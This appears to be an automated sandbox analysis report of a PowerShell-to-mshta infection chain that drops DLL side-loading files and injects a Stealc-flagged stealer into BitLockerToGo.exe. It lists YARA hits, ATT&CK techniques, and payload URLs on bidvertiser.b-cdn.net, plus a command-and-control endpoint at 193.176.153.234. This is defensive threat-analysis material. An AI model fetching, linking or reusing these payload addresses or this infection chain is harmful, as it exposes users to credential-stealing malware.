              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeQueries volume information: C:\Users\user\AppData\Roaming\0SmartAssem.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_030672F0 GetUserNameA,11_2_030672F0

              Stealing of Sensitive Information

              barindex
              Yara detected Go Injector
              Source: Yara matchFile source: 8.2.0SmartAssem.exe.7ff74ca60000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.0SmartAssem.exe.7ff74ca60000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0SmartAssem.exe PID: 7716, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, type: DROPPED
              Yara detected Stealc
              Source: Yara matchFile source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7916, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Go Injector
              Source: Yara matchFile source: 8.2.0SmartAssem.exe.7ff74ca60000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.0SmartAssem.exe.7ff74ca60000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0SmartAssem.exe PID: 7716, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, type: DROPPED
              Yara detected Stealc
              Source: Yara matchFile source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7916, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts112
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		311
              Process Injection              		21
              Masquerading              		OS Credential Dumping131
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		Logon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Timestomp              		DCSync2
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem23
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1491044 Sample: verification.b-cdn.net.ps1 Startdate: 10/08/2024 Architecture: WINDOWS Score: 100 48 bidvertiser.b-cdn.net 2->48 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 9 other signatures 2->62 11 powershell.exe 11 2->11         started        14 svchost.exe 1 1 2->14         started        signatures3 process4 dnsIp5 68 Encrypted powershell cmdline option found 11->68 70 Powershell drops PE file 11->70 17 powershell.exe 7 11->17         started        19 conhost.exe 11->19         started        54 127.0.0.1 unknown unknown 14->54 signatures6 process7 process8 21 mshta.exe 17 17->21         started        dnsIp9 52 bidvertiser.b-cdn.net 185.93.1.250, 443, 49730, 49734 CDN77GB Czech Republic 21->52 38 C:\Users\user\AppData\Local\...\smart1[1], PE32 21->38 dropped 64 Suspicious powershell command line found 21->64 66 Very long command line found 21->66 26 powershell.exe 14 34 21->26         started        file10 signatures11 process12 file13 40 C:\Users\user\AppData\Roaming\VBoxVMM.dll, PE32+ 26->40 dropped 42 C:\Users\user\AppData\...\VBoxSupLib.dll, PE32+ 26->42 dropped 44 C:\Users\user\...\VBoxSharedFolders.dll, PE32+ 26->44 dropped 46 4 other malicious files 26->46 dropped 72 Loading BitLocker PowerShell Module 26->72 30 0SmartAssem.exe 2 26->30         started        33 conhost.exe 26->33         started        signatures14 process15 signatures16 74 Multi AV Scanner detection for dropped file 30->74 76 Writes to foreign memory regions 30->76 78 Allocates memory in foreign processes 30->78 80 Injects a PE file into a foreign processes 30->80 35 BitLockerToGo.exe 14 30->35         started        process17 dnsIp18 50 193.176.153.234, 49743, 80 AGROSVITUA unknown 35->50

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              verification.b-cdn.net.ps10%ReversingLabs
              verification.b-cdn.net.ps12%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]39%ReversingLabsWin32.Dropper.Lumma
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]28%VirustotalBrowse
              C:\Users\user\AppData\Roaming\0SmartAssem.exe18%ReversingLabsWin64.Malware.Generic
              C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\Qt5SqlVBox.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\VBoxSharedFolders.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\VBoxSupLib.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\VBoxVMM.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
              https://aka.ms/pscore60%URL Reputationsafe
              https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
              https://g.live.com/odclientsettings/ProdV20%URL Reputationsafe
              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%URL Reputationsafe
              https://bidvertiser.b-cdn.net/F0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1H0%Avira URL Cloudsafe
              http://193.176.153.234/587ec30955d49a9c.php0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1.zipp0%Avira URL Cloudsafe
              http://193.176.153.234/:0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1C:0%Avira URL Cloudsafe
              http://193.176.153.234/587ec30955d49a9c.phpD0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1D0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1.zip100%Avira URL Cloudmalware
              https://bidvertiser.b-cdn.net2%VirustotalBrowse
              http://193.176.153.234/587ec30955d49a9c.php0%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1C:2%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1I90%Avira URL Cloudsafe
              http://crl.ver)0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1.zipp2%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1...r#0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1_BROWSER_APP_B0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1U0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1100%Avira URL Cloudmalware
              https://bidvertiser.b-cdn.net/smart1entV0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1c9x0%Avira URL Cloudsafe
              http://193.176.153.234/587ec30955d49a9c.php/0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1(i0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1.zip3%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1https://bidvertiser.b-cdn.net/smart10%Avira URL Cloudsafe
              https://protobuf.dev/reference/go/faq#namespace-conflictduration0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart13%VirustotalBrowse
              http://193.176.153.234/587ec30955d49a9c.phpl0%Avira URL Cloudsafe
              http://193.176.153.234/587ec30955d49a9c.php/2%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1m0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/h#0%Avira URL Cloudsafe
              https://protobuf.dev/reference/go/faq#namespace-conflictduration0%VirustotalBrowse
              http://193.176.153.234/587ec30955d49a9c.php00%Avira URL Cloudsafe
              http://193.176.153.2348:0%Avira URL Cloudsafe
              http://193.176.153.234/0%Avira URL Cloudsafe
              http://193.176.153.2340%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart1...100%Avira URL Cloudmalware
              https://bidvertiser.b-cdn.net/smart1:asLMEMPx0%Avira URL Cloudsafe
              http://193.176.153.2342%VirustotalBrowse
              http://193.176.153.234/2%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1...2%VirustotalBrowse
              http://193.176.153.234/X0%Avira URL Cloudsafe
              https://www.virtualbox.org/0%Avira URL Cloudsafe
              https://bidvertiser.b-cdn.net/smart100%Avira URL Cloudsafe
              https://www.virtualbox.org/0%VirustotalBrowse
              https://bidvertiser.b-cdn.net/smart1OOC:0%Avira URL Cloudsafe
              http://193.176.153.234;0%Avira URL Cloudsafe
              http://193.176.153.234/587ec30955d49a9c.phpx0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bidvertiser.b-cdn.net
              		185.93.1.250
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://193.176.153.234/587ec30955d49a9c.phptrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1.zipfalse
                • 3%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://bidvertiser.b-cdn.net/smart1true
                • 3%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://193.176.153.234/true
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://bidvertiser.b-cdn.net/Fmshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1Hmshta.exe, 00000003.00000002.2369149756.0000022F67060000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.net/smart1.zipppowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://bidvertiser.b-cdn.netpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmptrue
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://193.176.153.234/:BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
